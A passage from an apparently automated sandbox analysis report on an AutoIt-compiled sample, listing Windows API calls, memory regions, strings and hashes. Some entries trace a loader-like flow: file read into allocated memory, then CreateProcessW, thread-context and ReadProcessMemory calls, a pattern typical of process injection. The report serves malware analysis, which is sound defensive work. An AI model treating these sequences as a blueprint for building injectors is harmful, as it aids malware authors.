                                                              • Opcode Fuzzy Hash: f7873c81ad062ae217758de928334c4934f2bee84fa76db906ac30c380fda36b
                                                              • Instruction Fuzzy Hash: B5C129B190021DABDF15DFA5CE81EEEB7BDAF48310F0041AAF609E7152DB309A448F65

                                                              Control-flow Graph

                                                              APIs
                                                              • GetSysColorBrush.USER32(0000000F), ref: 00AB3F86
                                                              • RegisterClassExW.USER32(00000030), ref: 00AB3FB0
                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AB3FC1
                                                              • InitCommonControlsEx.COMCTL32(?), ref: 00AB3FDE
                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00AB3FEE
                                                              • LoadIconW.USER32(000000A9), ref: 00AB4004
                                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00AB4013
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                              • API String ID: 2914291525-1005189915
                                                              • Opcode ID: 6d1f349577c1d4a817f7c398508bd73fa90160557559b0206625f6ecee67ebd8
                                                              • Instruction ID: eee9cf9a89c9f2358a3fd8a6f527f07c1a80670a12ff5fb7640e0b9e607727bc
                                                              • Opcode Fuzzy Hash: 6d1f349577c1d4a817f7c398508bd73fa90160557559b0206625f6ecee67ebd8
                                                              • Instruction Fuzzy Hash: 4721C4B5910318EFDB00DFA8EC89BCDBBB4FB08710F10461AF615A72A0DBB545849FA1

                                                              Control-flow Graph

                                                              APIs
                                                              • DefWindowProcW.USER32(?,?,?,?), ref: 00AB37B3
                                                              • KillTimer.USER32(?,00000001), ref: 00AB37DD
                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00AB3800
                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AB380B
                                                              • CreatePopupMenu.USER32 ref: 00AB381F
                                                              • PostQuitMessage.USER32(00000000), ref: 00AB382E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                              • String ID: TaskbarCreated
                                                              • API String ID: 129472671-2362178303
                                                              • Opcode ID: 7a3ad9b4207679efcfc22eaf732ab55203fb0e7f668c99dc488f5e13792b58e9
                                                              • Instruction ID: 7fca991e7764a3569daae783b3403e3597612da2484aa3fd67e9d5a86eac692d
                                                              • Opcode Fuzzy Hash: 7a3ad9b4207679efcfc22eaf732ab55203fb0e7f668c99dc488f5e13792b58e9
                                                              • Instruction Fuzzy Hash: CB41D3F7104195ABDF14EB6CAD4ABFE36ADF714300F104929F51A93192CE609ED09772

                                                              Control-flow Graph

                                                              APIs
                                                              • GetSysColorBrush.USER32(0000000F), ref: 00AB3E79
                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00AB3E88
                                                              • LoadIconW.USER32(00000063), ref: 00AB3E9E
                                                              • LoadIconW.USER32(000000A4), ref: 00AB3EB0
                                                              • LoadIconW.USER32(000000A2), ref: 00AB3EC2
                                                                • Part of subcall function 00AB4024: LoadImageW.USER32(00AB0000,00000063,00000001,00000010,00000010,00000000), ref: 00AB4048
                                                              • RegisterClassExW.USER32(?), ref: 00AB3F30
                                                                • Part of subcall function 00AB3F53: GetSysColorBrush.USER32(0000000F), ref: 00AB3F86
                                                                • Part of subcall function 00AB3F53: RegisterClassExW.USER32(00000030), ref: 00AB3FB0
                                                                • Part of subcall function 00AB3F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AB3FC1
                                                                • Part of subcall function 00AB3F53: InitCommonControlsEx.COMCTL32(?), ref: 00AB3FDE
                                                                • Part of subcall function 00AB3F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00AB3FEE
                                                                • Part of subcall function 00AB3F53: LoadIconW.USER32(000000A9), ref: 00AB4004
                                                                • Part of subcall function 00AB3F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00AB4013
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                              • String ID: #$0$AutoIt v3
                                                              • API String ID: 423443420-4155596026
                                                              • Opcode ID: 16f045419800e02ce20c5217503c9a343a7a313aa9a125598c584b38eb44405a
                                                              • Instruction ID: 6016470ec36c591ee4e52a1e0cffb1066600b52afe8eeb6f713d7b30a269e5e6
                                                              • Opcode Fuzzy Hash: 16f045419800e02ce20c5217503c9a343a7a313aa9a125598c584b38eb44405a
                                                              • Instruction Fuzzy Hash: 332132B1D00304ABCB10DFADEC46A9DBFF5FB48310F50852AE218A72A1DB754680DFA1

                                                              Control-flow Graph

                                                              APIs
                                                              • __lock.LIBCMT ref: 00ADACC1
                                                                • Part of subcall function 00AD7CF4: __mtinitlocknum.LIBCMT ref: 00AD7D06
                                                                • Part of subcall function 00AD7CF4: EnterCriticalSection.KERNEL32(00000000,?,00AD7ADD,0000000D), ref: 00AD7D1F
                                                              • __calloc_crt.LIBCMT ref: 00ADACD2
                                                                • Part of subcall function 00AD6986: __calloc_impl.LIBCMT ref: 00AD6995
                                                                • Part of subcall function 00AD6986: Sleep.KERNEL32(00000000,000003BC,00ACF507,?,0000000E), ref: 00AD69AC
                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 00ADACED
                                                              • GetStartupInfoW.KERNEL32(?,00B66E28,00000064,00AD5E91,00B66C70,00000014), ref: 00ADAD46
                                                              • __calloc_crt.LIBCMT ref: 00ADAD91
                                                              • GetFileType.KERNEL32(00000001), ref: 00ADADD8
                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00ADAE11
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                              • String ID:
                                                              • API String ID: 1426640281-0
                                                              • Opcode ID: 7f82a5cc5e30adf48efcb97270ca5b74c7af19b1fb268ee95e5c9c7ce4fd59e7
                                                              • Instruction ID: 546e0d4a31b50955c635af97251b2ab5f2a01cb9e8019fa06f984d81628be3c3
                                                              • Opcode Fuzzy Hash: 7f82a5cc5e30adf48efcb97270ca5b74c7af19b1fb268ee95e5c9c7ce4fd59e7
                                                              • Instruction Fuzzy Hash: 4E81D3719053558FDB14CF68C8806ADBBF0AF59324B24425FE4ABAB3D1DB349843CB56

                                                              Control-flow Graph

                                                              APIs
                                                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00E87891
                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00E87AB7
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303683207.0000000000E85000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E85000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e85000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: CreateFileFreeVirtual
                                                              • String ID:
                                                              • API String ID: 204039940-0
                                                              • Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                              • Instruction ID: b5aa5c045dda2278d3493f3411ada355ae047d90482ed0ab753ff1bff547d14b
                                                              • Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                              • Instruction Fuzzy Hash: 54A14870E04209EBDB18DFA4C895BEEBBB5FF48304F209199E559BB280D7759E40CB90

                                                              Control-flow Graph

                                                              APIs
                                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00AB4A1D
                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00B241DB
                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00B2421A
                                                              • RegCloseKey.ADVAPI32(?), ref: 00B24249
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: QueryValue$CloseOpen
                                                              • String ID: Include$Software\AutoIt v3\AutoIt
                                                              • API String ID: 1586453840-614718249
                                                              • Opcode ID: a34a95cb74371d3028e9abed7bfa82f057548f8e47cf32e7e47dc035b476ea49
                                                              • Instruction ID: e0ca5d24b48a78e3d5383ef7175089dfa8289b9daa44f6bc26cc7b8cc3c8d8ad
                                                              • Opcode Fuzzy Hash: a34a95cb74371d3028e9abed7bfa82f057548f8e47cf32e7e47dc035b476ea49
                                                              • Instruction Fuzzy Hash: BC113D71600119BEEB04ABA4DE96DEF7BBCEF09744F100059B506E71A2EB709E41D750

                                                               Control-flow Graph (rendered graph; legend omitted, node summary kept)
                                                               control_flow_graph 1223 ab36b8-ab3728 CreateWindowExW * 2 ShowWindow * 2
                                                              APIs
                                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00AB36E6
                                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00AB3707
                                                              • ShowWindow.USER32(00000000,?,?,?,?,00AB3AA3,?), ref: 00AB371B
                                                              • ShowWindow.USER32(00000000,?,?,?,?,00AB3AA3,?), ref: 00AB3724
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Window$CreateShow
                                                              • String ID: AutoIt v3$edit
                                                              • API String ID: 1584632944-3779509399
                                                              • Opcode ID: a3f2a68ef27a6cd8645bde276619b1ea377f8eadc77bd53097689eb37167217f
                                                              • Instruction ID: 3b791704ee0e9e5096a6ce0c3a0c8c1059496590c7fc3dca6789e7da66378d6c
                                                              • Opcode Fuzzy Hash: a3f2a68ef27a6cd8645bde276619b1ea377f8eadc77bd53097689eb37167217f
                                                              • Instruction Fuzzy Hash: C8F0DA715402D07EE731A76FAC09E672E7ED7C6F20B10441EFA08A31B0C96108D5DAB1

                                                               Control-flow Graph (rendered graph; legend omitted, node summary kept)
                                                               control_flow_graph 1328 e875a0-e876bf call e851f0 call e87490 CreateFileW 1335 e876c1 1328->1335 1336 e876c6-e876d6 1328->1336 1337 e87776-e8777b 1335->1337 1339 e876d8 1336->1339 1340 e876dd-e876f7 VirtualAlloc 1336->1340 1339->1337 1341 e876f9 1340->1341 1342 e876fb-e87712 ReadFile 1340->1342 1341->1337 1343 e87714 1342->1343 1344 e87716-e87750 call e874d0 call e86490 1342->1344 1343->1337 1349 e8776c-e87774 ExitProcess 1344->1349 1350 e87752-e87767 call e87520 1344->1350 1349->1337 1350->1349
                                                              APIs
                                                                • Part of subcall function 00E87490: Sleep.KERNELBASE(000001F4), ref: 00E874A1
                                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00E876B5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303683207.0000000000E85000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E85000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e85000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: CreateFileSleep
                                                              • String ID: 7DLHXTXZ41SP5
                                                              • API String ID: 2694422964-740947721
                                                              • Opcode ID: d34266b5ce95a147d9bc49f2219d51109f91a2eccba2cec2acc160d98106224f
                                                              • Instruction ID: 6aca7c09bab477e248d3992275cbf6abc320d14600b1d9bf3523d5343340ffdc
                                                              • Opcode Fuzzy Hash: d34266b5ce95a147d9bc49f2219d51109f91a2eccba2cec2acc160d98106224f
                                                              • Instruction Fuzzy Hash: 3F518131D08249DBEF11EBA4C814BEEBB79AF09304F104199E65CBB2C0D7795B49CBA5
                                                              APIs
                                                              • _memset.LIBCMT ref: 00AB522F
                                                              • _wcscpy.LIBCMT ref: 00AB5283
                                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00AB5293
                                                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00B23CB0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                              • String ID: Line:
                                                              • API String ID: 1053898822-1585850449
                                                              • Opcode ID: 3a6043a30c2a12e48bef8069a68744ef8208e17005f933bf6d278d55d5ba9bc8
                                                              • Instruction ID: 9ea62c0a944decdb6e7582a68b0fa9ddf31caf8e27619fe4e89851c591c4ba93
                                                              • Opcode Fuzzy Hash: 3a6043a30c2a12e48bef8069a68744ef8208e17005f933bf6d278d55d5ba9bc8
                                                              • Instruction Fuzzy Hash: BA31B0718083406ED325EB68ED42FDE77ECEB44310F00491EF58993192DB74A688CB92
                                                              APIs
                                                                • Part of subcall function 00AB41A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00AB39FE,?,00000001), ref: 00AB41DB
                                                              • _free.LIBCMT ref: 00B236B7
                                                              • _free.LIBCMT ref: 00B236FE
                                                                • Part of subcall function 00ABC833: __wsplitpath.LIBCMT ref: 00ABC93E
                                                                • Part of subcall function 00ABC833: _wcscpy.LIBCMT ref: 00ABC953
                                                                • Part of subcall function 00ABC833: _wcscat.LIBCMT ref: 00ABC968
                                                                • Part of subcall function 00ABC833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 00ABC978
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                              • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                              • API String ID: 805182592-1757145024
                                                              • Opcode ID: 5211f5383ba14aef6b6c4713987ab420507c101eb4311accad0a063e7ef9b7a7
                                                              • Instruction ID: e32c44fe779e33590a19634d576d4806b9678969f7e111a63eb052c52ff3c173
                                                              • Opcode Fuzzy Hash: 5211f5383ba14aef6b6c4713987ab420507c101eb4311accad0a063e7ef9b7a7
                                                              • Instruction Fuzzy Hash: 4D91A471910229AFCF05EFA4DD919EEB7F8FF18710F004469F41AAB292DB389A05CB50
                                                              APIs
                                                                • Part of subcall function 00AB5374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00B71148,?,00AB61FF,?,00000000,00000001,00000000), ref: 00AB5392
                                                                • Part of subcall function 00AB49FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00AB4A1D
                                                              • _wcscat.LIBCMT ref: 00B22D80
                                                              • _wcscat.LIBCMT ref: 00B22DB5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: _wcscat$FileModuleNameOpen
                                                              • String ID: \$\Include\
                                                              • API String ID: 3592542968-2640467822
                                                              • Opcode ID: 2a61944c34c4d012752a54a3602f2e245cba128931e9d36185246795e911b1c0
                                                              • Instruction ID: a465d590e5fb66be300d5af2cbb54fdbb5be4623a39acc9acd392fa9b2714aa4
                                                              • Opcode Fuzzy Hash: 2a61944c34c4d012752a54a3602f2e245cba128931e9d36185246795e911b1c0
                                                              • Instruction Fuzzy Hash: 835161764043409BC714EF69EA8189AB7F8FE59310F80497EF64DA3662EF309684CB52
                                                              APIs
                                                              • __getstream.LIBCMT ref: 00AD34FE
                                                                • Part of subcall function 00AD7C0E: __getptd_noexit.LIBCMT ref: 00AD7C0E
                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 00AD3539
                                                              • __wopenfile.LIBCMT ref: 00AD3549
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                              • String ID: <G
                                                              • API String ID: 1820251861-2138716496
                                                              • Opcode ID: 5964d8d9de08528fd8ea18ab87577e08ff833140e6bae490be804a320b1da93b
                                                              • Instruction ID: 8e1fb441fddd2af5570945d2e9634b83aa23c4e32c71315306b7866119994b48
                                                              • Opcode Fuzzy Hash: 5964d8d9de08528fd8ea18ab87577e08ff833140e6bae490be804a320b1da93b
                                                              • Instruction Fuzzy Hash: 30110AB2A002069FDF11BF719D4267E36B4AF05790B148527E417DB381EB38CA0197A2
                                                              APIs
                                                              • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00ACD28B,SwapMouseButtons,00000004,?), ref: 00ACD2BC
                                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00ACD28B,SwapMouseButtons,00000004,?,?,?,?,00ACC865), ref: 00ACD2DD
                                                              • RegCloseKey.KERNELBASE(00000000,?,?,00ACD28B,SwapMouseButtons,00000004,?,?,?,?,00ACC865), ref: 00ACD2FF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: CloseOpenQueryValue
                                                              • String ID: Control Panel\Mouse
                                                              • API String ID: 3677997916-824357125
                                                              • Opcode ID: fe1d0ee70ff597be2ede5744575651752ac3c0ecdac83694e64b3da96ce2a36a
                                                              • Instruction ID: 9937e0d1645f8e8ad7085a4c35763f2f35c7f7909243a004e468f0e576ab9e8e
                                                              • Opcode Fuzzy Hash: fe1d0ee70ff597be2ede5744575651752ac3c0ecdac83694e64b3da96ce2a36a
                                                              • Instruction Fuzzy Hash: 14113575611218BFDB218FA8DC84EEF7BB8EF44744F11486DE805DB210EB31AE419B60
                                                              APIs
                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 00E86C4B
                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E86CE1
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E86D03
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303683207.0000000000E85000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E85000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e85000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                              • String ID:
                                                              • API String ID: 2438371351-0
                                                              • Opcode ID: a1064bca5dd4e59baeb4dd15c17425526c3ac906ac097e7eb484fd7342f8cad6
                                                              • Instruction ID: a9c2bd0cd3e11ef2c7c46e1b6a6b348d1889671abb4b9723137185e8fc249fa2
                                                              • Opcode Fuzzy Hash: a1064bca5dd4e59baeb4dd15c17425526c3ac906ac097e7eb484fd7342f8cad6
                                                              • Instruction Fuzzy Hash: CB62FB30A14258DBEB24DFA4C851BDEB372EF58304F1091A9E10DEB390E7769E85CB59
                                                              APIs
                                                                • Part of subcall function 00AB22A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00AB24F1), ref: 00AB2303
                                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00AB25A1
                                                              • CoInitialize.OLE32(00000000), ref: 00AB2618
                                                              • CloseHandle.KERNEL32(00000000), ref: 00B2503A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                              • String ID: 0
                                                              • API String ID: 3815369404-3684773922
                                                              • Opcode ID: 3d8ee816cd5e0373e5c21859b08a9f48915150721a67953138181157e932b22d
                                                              • Instruction ID: 016d72ac6ef1dda143d9c980700e4ee074ff0e3dfbe376d6a033d39e51f5e468
                                                              • Opcode Fuzzy Hash: 3d8ee816cd5e0373e5c21859b08a9f48915150721a67953138181157e932b22d
                                                              • Instruction Fuzzy Hash: 6271BEB59112858F8304EF6EA991599BBE8FB983407914AAED11EDB772DF304484CF38
                                                              APIs
                                                                • Part of subcall function 00AB4517: _fseek.LIBCMT ref: 00AB452F
                                                                • Part of subcall function 00AFC56D: _wcscmp.LIBCMT ref: 00AFC65D
                                                                • Part of subcall function 00AFC56D: _wcscmp.LIBCMT ref: 00AFC670
                                                              • _free.LIBCMT ref: 00AFC4DD
                                                              • _free.LIBCMT ref: 00AFC4E4
                                                              • _free.LIBCMT ref: 00AFC54F
                                                                • Part of subcall function 00AD1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00AD7A85), ref: 00AD1CB1
